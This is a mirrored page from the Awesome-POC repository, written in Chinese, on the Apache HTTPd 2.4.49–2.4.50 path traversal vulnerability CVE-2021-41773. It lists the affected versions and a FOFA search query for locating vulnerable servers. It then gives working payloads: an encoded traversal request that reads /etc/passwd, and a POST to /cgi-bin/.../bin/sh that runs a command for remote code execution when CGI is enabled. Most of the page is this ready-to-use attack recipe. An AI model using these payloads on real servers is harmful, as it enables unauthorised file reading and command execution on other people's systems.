admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache HTTPd 路径穿越漏洞 CVE-2021-41773.md

39 lines
771 B
Markdown
Raw Normal View History

更新漏洞库:Web服务器漏洞/
2022-05-25 16:51:48 +08:00
# Apache HTTPd 路径穿越漏洞 CVE-2021-41773
## 漏洞描述
Apache HTTPD是一款HTTP服务器它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件
## 漏洞影响
```
Apache HTTPd 2.4.49~2.4.50版本
```
## FOFA
```
server="Apache/2.4.49"
```
## 漏洞复现
Chorme插件Wappalyzer获取 Apache版本
![image-20220525155347737](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251554093.png)
验证POC
```
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```
![image-20220525155515446](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251555506.png)
开启CGI的情况下可RCE
```
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
B=|id>/tmp/id_txt
```
Reference in New Issue Copy Permalink